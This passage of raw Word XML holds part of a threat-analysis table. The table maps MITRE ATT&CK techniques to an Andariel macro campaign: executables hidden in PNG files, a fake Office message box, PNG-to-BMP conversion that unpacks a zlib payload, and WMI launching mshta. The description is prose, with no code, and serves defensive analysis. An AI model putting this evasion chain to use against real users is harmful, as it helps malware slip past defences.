            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782D6617" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00B857D7" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00B275FF" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00B857D7" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59657201" w14:textId="53DE98AC" w:rsidR="002B6133" w:rsidRPr="00B857D7" w:rsidRDefault="003519AF" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23D37D50" w14:textId="25D284AD" w:rsidR="002B6133" w:rsidRPr="00B857D7" w:rsidRDefault="00B076C3" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002B6133" w:rsidRPr="00461F9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Andariel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="002B6133" w:rsidRPr="00461F9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> has hidden malicious executables within PNG files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008035DA" w:rsidRPr="00361C44" w14:paraId="718C1377" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26E29A09" w14:textId="36286D1B" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E3C1B97" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00361C44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00361C44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00361C44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00361C44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00361C44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42FB6545" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00361C44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1036 Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4168D3BF" w14:textId="5AF02ED6" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="008312C5" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D900B65" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1206B2" w14:textId="77777777" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="002B6133" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3097AECF" w14:textId="77731CBB" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="003519AF" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="461A145D" w14:textId="497AA30D" w:rsidR="002B6133" w:rsidRPr="00361C44" w:rsidRDefault="000324F6" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="002B6133" w:rsidRPr="0023637A">
              <w:t>The macro added the extension zip to the BMP file during the image conversion process to pretend it’s a zip file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D4C19" w:rsidRPr="00B857D7" w14:paraId="53D5EA26" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29D6AC77" w14:textId="2204E8EC" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="002B6133" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C132412" w14:textId="56D7A4B6" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">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148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="355BAA45" w14:textId="3B7997FA" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="203BE0AF" w14:textId="4D8E7F3F" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79CFCDC7" w14:textId="77777777" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="700A5B96" w14:textId="13AA4ACB" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="001D4C19" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="189FE9EB" w14:textId="6BDE0ABB" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49DD8F79" w14:textId="5F43F3A3" w:rsidR="001D4C19" w:rsidRPr="00B857D7" w:rsidRDefault="002B6133" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00B076C3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Document weaponized with macro. </w:t>
            </w:r>
            <w:r w:rsidRPr="002B6133">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">The macro starts by calling </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002B6133">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>MsgBoxOKCancel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002B6133">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> function. This function pops up a message box to the user with a message claiming to be an older version of Microsoft Office. After showing the message box, it performs the following steps:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008035DA" w:rsidRPr="00ED5880" w14:paraId="6D00F2B9" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6744EF82" w14:textId="77777777" w:rsidR="009B359A" w:rsidRPr="008035DA" w:rsidRDefault="009B359A" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA52A16" w14:textId="03A6E5AB" w:rsidR="009B359A" w:rsidRPr="008035DA" w:rsidRDefault="009B359A" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="00CB2838">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidR="005D751B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="005D751B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D4C825C" w14:textId="1EFF69DB" w:rsidR="009B359A" w:rsidRPr="008035DA" w:rsidRDefault="009B359A" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1140 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B31BA45" w14:textId="77777777" w:rsidR="009B359A" w:rsidRPr="008035DA" w:rsidRDefault="009B359A" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC3C168" w14:textId="77777777" w:rsidR="009B359A" w:rsidRPr="008035DA" w:rsidRDefault="009B359A" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DF928A" w14:textId="1B010FD7" w:rsidR="009B359A" w:rsidRPr="008035DA" w:rsidRDefault="009B359A" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008035DA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41059738" w14:textId="55B696E2" w:rsidR="009B359A" w:rsidRPr="008035DA" w:rsidRDefault="003519AF" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E870614" w14:textId="7A827BF2" w:rsidR="009B359A" w:rsidRPr="00C40957" w:rsidRDefault="009B359A" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="000324F6">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] Converts the image in PNG format into BMP format by calling </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>WIA_ConvertImage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Since the BMP file format is uncompressed graphics file format, converting a PNG file format into BMP file format automatically decompresses the malicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>zlib</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> object embedded from PNG to BMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C4CEE" w:rsidRPr="00A9033C" w14:paraId="4661750E" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="773" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22E59F1E" w14:textId="6BE16B81" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="008312C5" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E16052F" w14:textId="29D1ACDD" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="008312C5" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2148" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DD1BA43" w14:textId="17A9ED62" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="008312C5" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1047 </w:t>
            </w:r>
            <w:r w:rsidR="009809A1" w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows Management Instrumentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41E35C2E" w14:textId="6D048D29" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="009809A1" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A542142" w14:textId="77777777" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="008312C5" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188CC4EF" w14:textId="62A83F73" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="009809A1" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="779" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B6BC423" w14:textId="692C8D75" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="003519AF" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20505F37" w14:textId="170E5AA7" w:rsidR="008312C5" w:rsidRPr="00A9033C" w:rsidRDefault="009809A1" w:rsidP="00616B39">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="000324F6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00A9033C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="00A9033C" w:rsidRPr="00A9033C">
              <w:t xml:space="preserve">Gets a WMI object to call </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A9033C" w:rsidRPr="00A9033C">
              <w:t>Mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A9033C" w:rsidRPr="00A9033C">
              <w:t xml:space="preserve"> to execute the bmp file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00522B73" w:rsidRPr="00ED5880" w14:paraId="4EFB9B15" w14:textId="77777777" w:rsidTr="008035DA">
        <w:tc>
          <w:tcPr>
